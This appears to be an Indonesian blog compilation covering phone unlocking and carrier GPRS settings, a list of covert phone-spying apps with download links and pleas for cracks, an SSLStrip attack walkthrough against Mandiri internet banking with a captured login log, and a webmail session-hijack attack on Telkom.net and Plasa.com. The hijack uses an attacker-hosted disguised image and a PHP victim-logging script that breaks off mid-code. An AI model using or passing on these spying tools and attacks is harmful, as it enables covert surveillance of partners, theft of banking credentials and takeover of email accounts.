-->

Cara Aktifkan Handphone Terkunci | Unlocker

Cara dan Trik Mudah Membuka Handphone yang terkunci atau terLock
Apakah SObat pernah mengalami Ponsel Pribadi Terkunci dan Ponsel meminta anda untuk memasukkan Sandi, sedangkan anda lupa kodenya? Asal Jangan Lupa diri lho.
Di sini Saya posting sebuah utilitas untuk unlocking Nokia, Siemens, Samsung, Vitel, Maxel, Panasonic, Motorola, LG, dan telepon selular AEG. Utilitas ini juga mencakup kalkulator MasterCode yang dapat mengatur ulang kode keamanan Nokia jika Anda kehilangan itu.

Kode fitur WorldUnlock Kalkulator :

  • Unlock Nokia
  • Unlock LG
  • Unlock Panasonic
  • Unlock Maxon
  • Unlock Samsung
  • Unlock AEG / Telital
  • Unlock Nokia
  • Unlock Siemens
  • Unlock Sony
  • Aktifkan Vitel

Panduan mudah untuk membuka Nokia gratis:
(Silakan baca seluruh panduan sebelum memulai)

Pilih model telepon dari daftar.
Masukkan nomor IMEI telepon Anda (Tekan * # 06 # di ponsel)
Pilih negara dan penyedia layanan di mana ponsel dibeli.
Tekan tombol: Hitung!
Perangkat lunak ini menghasilkan beberapa kode untuk membuka Nokia.
Jika 7 kode tersebut ditampilkan, gunakan kode terakhir dari 7 pertama.
Jika tidak bekerja, maka cobalah 1, dan akhirnya 5.
Bila telepon menampilkan "pembatasan Sim off" itulah yg dibuka.
Jika hanya dua kode tersebut ditampilkan (+1 dan +2) masukkan mereka berdua!
Kode akan ditampilkan pada form: # pw + CODE + n #
Untuk mendapatkan p, w atau +, Pres tombol * beberapa kali.

Silahkan Download Aplikasinya
Download WorldUnlock Kalkulator Kode

Pengaturan GPRS Untuk HP China

Berikut adalah pengaturan Office Mobile, Airtel Live dan MMS Airtel untuk SEMUA HP CHINA
  1. Office Mobile
    pertama klik ikon
    SERVICES dalam menu utama ==> == DATA ACCOUNT> GPRS ==> EDIT setiap account yang ada ==>
    Nama account -> MO
    APN -> airtelgprs.com
    Auth. Jenis -> Normal
    menyimpan semua pengaturan.
    Kembalilah ke SERVICES ==> WAP ==> PENGATURAN ==> EDIT PROFIL ==> EDIT setiap account yang ada ==>
    Ubah nama Profil ==> Mobile Office
    Homepage ==> Google
    data account ==> MO (yang kita buat sebelumnya)
    Jenis Sambungan ==>
    Di sini u menemukan tiga pilihan
    a) Connection-oriented
    b) connectionless
    c) HTTP
    memilih) Koneksi berorientasi ==
    Alamat IP ==> 202.056.231.117
    Keamanan ==> off
    Sekali lagi simpan semua pengaturan dan klik tombol BACK, dan pilih "Aktifkan Profil"
    Kembalilah ke SERVICES ==> WAP ==> Situs Web
    dan  Anda siap untuk menggunakan Mobile Office ...
  2. Airtel Live
    pertama klik ikon SERVICES dalam menu utama ==> == DATA ACCOUNT> GPRS ==> EDIT setiap account yang ada ==>
    Nama account -> LIVE
    APN -> airtelfun.com
    Auth. Jenis -> Normal
    Smpan semua pengaturan.
    Kembalilah ke SERVICES ==> WAP ==> PENGATURAN ==> EDIT PROFIL ==> EDIT setiap account yang ada ==>
    Ubah nama Profil ==> Airtel Live
    Homepage ==> http://live.airtelworld.com
    data account ==> LIVE (yang kita buat sebelumnya)
    Jenis Sambungan ==>
    Di sini Anda menemukan tiga pilihan
    a) Connection-oriented
    b) connectionless
    c) HTTP
    memilih c) HTTP ==>
    Alamat proxy ==> 100.001.200.099
    Port proxy ==> 8080
    Sekali lagi simpan semua pengaturan dan klik tombol BACK, dan pilih "Aktifkan Profil"
    Kembalilah ke SERVICES ==> WAP ==> Situs Web
    dan r Anda siap untuk menggunakan Airtel Live ...
  3. MMS Airtel
    pertama klik ikon SERVICES dalam menu utama ==> == DATA ACCOUNT> GPRS ==> EDIT setiap account yang ada ==>
    Nama account -> MMS
    APN -> airtelmms.com
    Auth. Jenis -> Normal
    menyimpan semua pengaturan.
    Kembalilah ke SERVICES ==> WAP ==> PENGATURAN ==> EDIT PROFIL ==> EDIT setiap account yang ada ==>
    Ubah nama Profil ==> Airtel MMS
    Homepage ==> http://100.1.201.171:10021/mmsc
    data account ==> MMS (yang kita buat sebelumnya)
    Jenis Sambungan ==>
    Di sini u menemukan tiga pilihan
    a) Connection-oriented
    b) connectionless
    c) HTTP
    memilih c) HTTP ==>
    Alamat proxy ==> 100.1.201.172
    Port proxy ==> 8799
    Sekali lagi menyimpan semua pengaturan dan klik tombol BACK, dan pilih "Aktifkan Profil"
    Kembalilah ke JASA ==> WAP ==> Situs Web
    dan Anda siap untuk menggunakan Airtel MMS .

Kumpulan Aplikasi Penyadap Telepon dan SMS


  • Mobile Secuware
    Fitur penyadap Mobile Secuware bisa digunain utk memantau pacar aato tmen kita lewat fitur Remote Monitoringvnya. Selaen ntu Aplikasi ini dibekali kemampuan anti maling, jd klo hp ncang2 pd ilang ato di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)
    aplikasi nya bisa di donlot di http://www.mobile-secuware.com

  • Xelnex Lite
    Xelnex Lite bisa digunain utk ngerekam pembicaraan ditelpon tanpa didahului bunyi 'beep'. jd terjaga kerahasiaaan nya,,
    sayang nya aplikasi niy masih shareware alias bayar, tp kita bisa nyoba versi trial nya selama 10 hari n' aplikasi niy kompatibel utk Symbian S60 3rd edition.
    klo ada yg mo nyoba donlot aja di http://shop.psiloc.com/d/s60/XelnexLite_s603rd.sisx


  • NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..
  • Mobile-Spy
    Pengguna hp Symbian S60 udh bisa make layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dr pc ato hp laen lewwat server yg disediain.
    selaen Symbian, hp yg berbasis windows Smartphone jg bisa make aplikasi niy...
    sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba donlot di http://www.mobile-spy.com/MobileSpy.CAB versi trial nya cuman 7 hari

    NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..


  • BT Info
    aplikasi yg niy cuman memanfaatkan bluetooth doank, ya jd sama lah kya aplikasi2 laen...
    klo ada yg mo nyoba, donlot di http://en.k508i.wz.cz/jar/ftp_bt_105.jar
    BT Info jg bisa digunain utk ngendaliin semua fungsi hp, kaya nelpon, kamera, alarm, master reset, ampe matiin hp juga bisa.


  • Call Rrecorder dan AGLAYA Call Magic
    fungsi nya cuman utk ngerekam pembicaraan telpon doank,,
    klo ada yg mo nyoba, donlot disini aja http://symbianware.com <== utk Call Recorder nya http://www.aglaya.com/symbian/symbia...call_magic.asp <== utk AGLAYA Call Magic nya


  • TimedSpy
    klo pnya hp Symbian S60 v.2 bisa langsung make tnpa alat tambahan,,
    fungsi nya utk mengintai orang, jd aplikasi nya melakukan pemotretan trus hasil nya lngsung dikirm gituu...
    klo ada yg mo nyoba, donlot di http://www.diginaut.com/mobile/archi...edSpyTrial.sis


  • Magic Blue Hack
    Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel utk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.
    Fitur yg tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.
    klo ada yg mo nyoba, donlot di http://www.getjar.com/products/175782/MagicBlueHack


  • BT Teror
    Untuk usil2an, bisa di donlot di http://www.symbian-freak.com/downloa...eror_S60v3.zip.
    Fungsi nya untuk memanipulasi bluetooth, jd aplikasi nya utk ngirim file2 ke hp target terus2an,, jd kaya flooding gitu deh...
    Aplikasi niy harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Utk nge donlot Python nya bisa donlot di http://sourceforge.net/project/showf...roup_id=154155


  • Mobiscope beta
    Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jd, nnti nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).
    klo ada yg mo nyoba, donlot di http://www.mobiscope.com/.
    dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lg, aplikasi niy dilengkapin fitur sensor gerak dan scheduler, utk merekam situasi pada waktu tertentu.


  • SMS Anywhere
    SMS Anywhere fungsi nya nge forward semua sms yg dikirim n' diterima ponsel target ke ponsel kita.
    klo ada yg mo nyoba, donlot di http://www.wireless-labs.com/smsanywhere/

  • MITM Attack on Mandiri Internet Banking using SSLStrip

    Https (http over SSL) sebenarnya adalah protokol yang sangat aman, protokol ini menjamin keamanan data dari browser hingga web server. MITM attack (man in the middle) tidak bisa dilakukan terhadap https karena https memiliki fitur authentication sehingga attacker tidak bisa menyamar sebagai web server. Walaupun mitm attack tidak bisa dilakukan terhadap https, namun attacker tetap bisa menyerang user yang menggunakan http sebagai pintu masuk menuju https. Dalam artikel ini saya akan jelaskan tentang SSLStrip, sebuah tool yang dibuat oleh Moxie Marlinspike untuk melakukan serangan mitm terhadap pengguna situs yang dilindungi dengan https.

    SSL is not vulnerable to MITM attack
    MITM attack adalah serangan dimana attacker berada di tengah bebas mendengarkan dan mengubah percakapan antara dua pihak. Jadi dengan serangan MITM ini attacker tidak hanya pasif mendengarkan, tetapi juga aktif mengubah komunikasi yang terjadi. Sebagai contoh, pada percakapan antara Alice dan Bob, Charlie menjadi pihak yang ditengah melakukan MITM attack. Charlie tidak hanya bisa mendengarkan percakapan itu, namun juga bisa mengubah percakapannya. Ketika Alice berkata “Besok makan siang jam 7″, Charlie bisa mengubahnya menjadi “Besok makan siang dibatalkan” sehingga Bob mengira makan siang dengan Alice tidak jadi.
    Kenapa MITM attack bisa terjadi? MITM attack bisa terjadi karena sebelum berkomunikasi kedua pihak tidak melakukan authentication. Authentication berguna untuk memastikan identitas pihak yang berkomunikasi, apakah saya sedang berbicara dengan orang yang benar, atau orang ke-3 (the person in the middle) ? Tanpa authentication Alice akan mengira sedang berbicara dengan Bob, sedangkan Bob juga mengira sedang berbicara dengan Alice, padahal bisa jadi sebenarnya Alice sedang berbicara dengan Charlie dan Bob juga sedang berbicara dengan Charlie, sehingga Charlie bertindak sebagai “the person in the middle”. Seharusnya sebelum Alice dan Bob berbicara, harus ada authentication, untuk memastikan “Who are you speaking with?”. Alice harus memastikan “Are you really Bob? Prove it!”, sedangkan Bob juga harus memastikan “Are you really Alice? Prove it!”.
    SSL adalah protokol yang memiliki tingkat keamanan sangat tinggi. SSL tidak hanya mengatur tentang enkripsi, namun juga mengatur tentang authentication sehingga SSL tidak rentan terhadap serangan man in the middle. SSL menggunakan sertifikat yang memanfaatkan kunci publik dan kunci private sebagai cara untuk melakukan authentication. Dengan menggunakan sertifikat SSL ini, pengunjung web bisa yakin sedang berkomunikasi dengan web server yang benar, bukan attacker in the middle yang menyamar menjadi web server suatu situs.
    Attacker yang mencoba menjadi “the person in the middle”, akan dengan mudah ketahuan karena attacker tidak bisa membuktikan identitasnya dengan sertifikat SSL yang sah. Sertifikat SSL yang sah haruslah ditandatangani oleh CA (certificate authority) yang dipercaya dan tersimpan dalam daftar trusted CA browser. Jadi bila attacker mencoba membuat sertifikat SSL sendiri, browser akan memberi peringatan keras pada pengunjung bahwa sertifikat SSL tidak bisa dipercaya dan pengunjung disarankan untuk membatalkan kunjungan karena beresiko terkena serangan mitm. Serangan mitm attack baru bisa berhasil bila pengunjung tetap bandel dan nekat untuk menggunakan sertifikat palsu tersebut. Bila ini yang terjadi, maka kesalahan ada pada pengguna, bukan kelemahan SSL sebagai protokol. Lebih detil tentang https silakan baca Understanding Https.
    HTTPS vs HTTP, Trusted vs Untrusted
    http adalah protokol yang tidak bisa dipercaya karena rentan terhadap serangan mitm. Sedangan http over SSL (https) adalah protokol yang bisa dipercaya karena protokol ini tidak rentan terhadap serangan mitm. Informasi yang dilihat  pengunjung pada browser di sebuah page http sebenarnya tidak bisa dipercaya karena tidak ada jaminan integritas dan keontentikan data. Informasi tersebut kemungkinan sudah diubah di tengah jalan atau berasal dari sumber yang tidak otentik (orang lain). dan pengunjung tidak bisa melakukan verifikasi.
    Sedangkan informasi yang dilihat pengunjung pada browser di sebuah halaman https bisa dipercaya karena DIJAMIN informasi yang diterima adalah sama dengan yang dikirim web server dan informasi tersebut juga DIJAMIN dikirim oleh web server yang benar. Dulu saya pernah menulis artikel tentang Trusted vs Untrusted klikBCA, yang menjelaskan tentang adanya dua subdomain yang berbeda, yang trusted menggunakan https dan yang untrusted menggunakan http.
    HTTP as Gate to HTTPS
    Jarang sekali orang mengunjungi situs dengan mengetikkan https:// bahkan http:// pun orang sudah malas. Kebanyakan orang langsung mengetikkan alamat situs yang ditujunya tanpa harus diawali dengan http:// atau https://. Secara default browser akan berasumsi bahwa pengunjung akan menggunakan protokol http, bukan https bila pengunjung tidak menyebutkan protokolnya.
    Kebanyakan situs yang harus memakai https, memang dirancang untuk menerima request melalui http (port 80) atau https (port 443). Situs pada port 80 biasanya hanya dijadikan jembatan untuk menuju situs yang sebenarnya pada port 443. Bila pengunjung masuk melalui port 80, maka server akan memberikan link untuk menuju URL https, atau dengan memberikan response Redirect.
    Jadi bisa disimpulkan bahwa sebagian besar pengunjung memasuki https dengan melalui http, dengan kata lain http sebagai gerbang menuju https. Metode peralihan dari situs http ke situs https ada beberapa cara, yaitu:
    • Memberikan link menuju URL https.
    • Memberikan response redirect ke URL https.
    • Menggunakan META tag auto refresh ke URL https.
    • Menggunakan javascript untuk load halaman https.
    Attacking HTTP, not HTTPS
    Sebelumnya sudah saya jelaskan bahwa https adalah protokol yang sangat secure sehingga tidak bisa diserang dengan serangan mitm. Namun mengingat kenyataan bahwa kebanyakan orang mengakses https melalui http, maka attacker memiliki peluang untuk menyerang ketika pengunjung masih berada dalam protokol http.
    SSLStrip adalah tool untuk melakukan mitm attack pada protokol http  (bukan HTTPS), dengan maksud untuk menyerang situs-situs yang dilindungi dengan https. SSLStrip sebagai “the person in the middle”, akan mencegah peralihan dari http ke https dengan secara aktif mengubah response dari server sehingga pengunjung akan tetap berada dalam protokol http.
    Mari kita lihat beberapa cara peralihan dari http ke https, saya tambahkan cara SSLStrip mencegah peralihan itu:
    • Memberikan link menuju URL https: SSLStrip akan mengubah link berawalan https menjadi http. Sehingga yang muncul di browser korban bukan link ke https melainkan link ke http.
    • Memberikan response redirect ke URL https: SSLStrip akan mengubah header Location dari URL berawalan https menjadi http.
    • Menggunakan META tag auto refresh ke URL https: SSLStrip akan mengubah url https menjadi http.
    • Menggunakan javascript untuk load halaman https: SSLStrip akan mengubah url https menjadi http.
    Untuk lebih jelasnya berikut adalah gambar yang menunjukkan salah satu cara kerja SSLStrip mencegah korban beralih dari http ke https.
    Opening Bank Front Page
    Opening Bank Front Page
    Pada gambar di atas korban mengakses web server bank dengan URL http://bank/. Request tidak secara langsung dikirim ke web server, namun melalui SSLStrip dulu. SSLStrip meneruskan request tersebut ke web server. Kemudian web server menjawab dengan memberikan html berisi link ke URL https://bank/login/ kepada SSLStrip. Sebelum response html diterima oleh browser, SSLStrip mengubah response tersebut dengan mengubah URL https menjadi http biasa sehingga HTML yang diterima di browser korban berisi link ke URL http://bank/login/ bukan https://bank/login/.
    Opening login page
    Opening login page
    Korban mengklik link pada halaman yang muncul browsernya, tentu saja link ini bukan ke https://bank/login/ melainkan ke http://bank/login/. Dengan cara ini browser tetap dalam protokol http bukan dalam protokol https seperti seharusnya, dengan kata lain SSLStrip berhasil mencegah browser beralih ke protokol https. Request ke http://bank/login/ tersebut dikirimkan ke SSLStrip. Kemudian SSLStrip tidak meneruskan request tersebut ke http://bank/login/, melainkan membuat request baru ke https://bank/login/. Kemudian web server mengirimkan response dari response tersebut ke SSLStrip. Seperti biasanya SSLStrip akan mengubah response dari server tersebut untuk mencegah peralihan ke https. Response yang telah diubah ini kemudian dikirimkan ke browser korban sehingga korban tetap melihat halaman yang sama persis seperti ketika dia membuka https://bank/login/. Dengan tampilan yang sama persis ini, korban mengira sedang membuka https://bank/login/, padahal sebenarnya dia sedang membuka http://bank/login/. Perhatikan bahwa koneksi antara browser dengan SSLStrip adalah dalam http biasa, sedangkan dari SSLStrip ke web server dalam https.
    submit username and password
    submit username and password
    Setelah muncul halaman login dan korban mengira sedang membuka https://bank/login, kemudian korban memasukkan username dan password dan mengklik tombol Login. Browser akan membuat POST request ke http://bank/login/ yang diterima oleh SSLStrip. Karena protokolnya adalah http, maka SSLStrip dengan mudah bisa membaca username dan password yang dimasukkan korban. SSLStrip kemudian akan mengirimkan username dan password korban degan POST request ke https://bank/login/.  Seperti biasa jawaban dari webserver akan dimodifikasi dulu seperlunya oleh SSLStrip sebelum dikirimkan ke browser korban.
    Perhatikan bahwa korban sejak awal hingga login mengakses situs dengan http, sedangkan SSLStrip di tengah-tengah membuat koneksi https ke web server yang sebenarnya. Jadi walaupun browser mengakses dengan http, namun response yang diterima browser berasal dari koneksi https yang dibuat oleh SSLStrip.
    Case Study: Mandiri Internet Banking
    Mari kita coba trik di atas dengan contoh kasus pada situs internet banking Mandiri. Karena ini hanya contoh, saya tidak menggunakan teknik ARP Spoofing untuk melakukan MITM attack yang sesungguhnya. Saya sengaja mengubah setting browser saya agar menggunakan proxy, yaitu SSLStrip. Dalam website SSLStrip, disebutkan seharusnya cara untuk melakukan MITM attack dengan SSLStrip adalah:
    • Setting komputer agar bisa melakukan forwarding paket
    • Setting iptables untuk mengarahkan traffic HTTP ke SSLStrip
    • Jalankan SSLStrip
    • Gunakan ARPSpoof untuk meyakinkan jaringan bahwa traffic harus dikirimkan melalui komputer yang menjalankan SSLStrip.
    Dalam contoh ini saya tidak melakukan ARPSpoofing, namun saya menggunakan SSLStrip sebagai proxy yang saya setting dalam browser saya. Sehingga setiap traffic http yang dilakukan browser saya akan dikirimkan melalui SSLStrip sebagai man in the middle.
    Saya menjalankan SSLStrip di linux dengan IP address 192.168.0.10. Cara menjalankannya mudah sekali, cukup jalankan perintah: python sslstrip.py -l portnumber . Kemudian pada browser saya setting untuk menggunakan proxy 192.168.0.10 dan port sesuai dengan port sslstrip. Untuk lebih jelasnya, perhatikan gambar di bawah ini:
    setting up SSLStrip as proxy in IE
    setting up SSLStrip as proxy in IE
    Setelah semuanya siap, mari kita coba melakukan serangan mitm. Pada skenario ini, korban akan login ke Mandiri IB tidak dengan mengetikkan https://ib.bankmandiri.co.id, karena korban hanya hafal bankmandiri.co.id saja maka korban langsung mengetikkan bankmandiri.co.id (tanpa diawali www atau http://). Secara default browser akan menganggap korban menghendaki koneksi dengan protokol http, bukan https. Request http tersebut dikirimkan melalui SSLStrip sebagai man in the middle, dan berikut adalah response yang diterima di browser korban. Sebagai pembanding saya juga berikan gambar screenshot halaman depan bank mandiri yang asli (tidak dimodifikasi sslstrip).
    bank mandiri front page modified by sslstrip
    bank mandiri front page modified by sslstrip
    real mandiri front page (not modified)
    real mandiri front page (not modified)
    Login ke Mandiri IB dilakukan dengan mengklik tombol Login di halaman depan bank mandiri. Login tersebut sebenarnya adalah link ke URL https, namun SSLStrip mengubahnya menjadi http agar korban tidak beralih ke modus https. Berikutnya korban akan mengklik tombol Login, sehingga browser akan mengakses URL http://ib.bankmandiri.co.id (bukan https://). Berikut adalah gambar screenshot halaman login Mandiri IB yang telah dimodifikasi sslstrip dan yang masih asli. Kedua gambar di bawah ini sangat mirip, perbedaannya hanya pada penggunaan awalan http:// dan https://. Saya yakin kebanyakan orang tidak akan menyadari bahwa dia sedang menggunakan http biasa, bukan https.
    Mandiri IB login page modified by sslstrip
    Mandiri IB login page modified by sslstrip
    real login page, https version and not modified
    real login page, https version and not modified
    Berikutnya setelah bertemu dengan halaman login, korban akan dengan senang hati memasukkan username dan password. Request tersebut dikirimkan dalam request POST http (bukan https) ke sslstrip. Karena POST dikirim melalui http, maka sslstrip bisa dengan mudah menyimpan username dan password korban.Berikut ini adalah log dari sslstrip yang menangkap username dan password Mandiri IB.
    1
    2
    3
    
    2009-05-06 12:00:43,339 Sending header: content-type: application/x-www-form-urlencoded
    2009-05-06 12:00:43,339 Sending header: proxy-connection: Keep-Alive
    2009-05-06 12:00:43,339 POST Data (ib.bankmandiri.co.id): action=result&userID=sensordong&password=rahasiabangetsensor&image.x=79&image.y=20
    Setelah itu sslstrip akan mengirimkan username dan password korban dalam POST request ke URL https (ini adalah url submit yang asli). Response yang diberikan oleh webserver Mandiri IB akan dimodifikasi seperlunya dan dikembalikan ke browser korban. Bila login berhasil, maka korban akan melihat tampilan seperti gambar dibawah ini, sebagai pembanding saya juga sertakan gambar bila menggunakan protokol https.
    login success page in http mode, modified by sslstrip
    login success page in http mode, modified by sslstrip
    real login success page, https mode, not modified
    real login success page, https mode, not modified
    Seperti pada halaman login, halaman setelah login berhasil juga sama persis walaupun menggunakan protokol http. Korban tidak akan menyadari bahwa dia sedang menggunakan http, bukannya https karena tampilannya memang tidak ada bedanya.
    Tips Pencegahan
    Serangan mitm dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif.

    Hacking Email Telkom.net dan Plasa.com

    Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

    Webmail Session Hijacking
    Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.
    Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.
    SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:
    1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
    2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi:
      <A href="http://www.somesite.com/inbox.php?PHPSESSID=xxxxxxxxx">INBOX</A>
      Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.
    SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly (baca: protecting cookie with httponly ). Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.
    Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.
    Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.
    telkom.net URL
    telkom.net URL

    plasa.com URL
    plasa.com URL
    SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com:
    http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&amp;
    http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&amp;
    Stealing SessionID from Referer Header
    Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.
    Ketika pengunjung sedang membuka halaman dengan URL:
    http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX
    Kemudian ketika terjadi request ke sebuah file image:
    http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif
    Maka pada request GET tersebut akan ada header seperti di bawah ini:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    
    GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
    Host: mail.telkom.net
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
    Cache-Control: max-age=0
    Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.
    Attack Scenario
    Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.
    Preparing the Script
    Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.
    URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan:
    1
    2
    3
    
    RewriteEngine On
    RewriteBase /
    RewriteRule mylab/image.jpg mylab/checkmail.php
    Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    
    <?php
    // Ambil header Referer
    $ref = $_SERVER["HTTP_REFERER"];
    $telkomnet = false;
    $plasacom = false;
    $width = 468;
    $height = 100;
    if (strpos($ref,"telkom.net")>-1) {
     $telkomnet = true;
    }
    if (strpos($ref,"plasa.com")>-1) {
     $plasacom = true;
    }
    if ($telkomnet===false && $plasacom===false) {
            exit();
    }
     
    $file = fopen("daftarkorban.txt","a");
    $url_tokens = parse_url($ref);
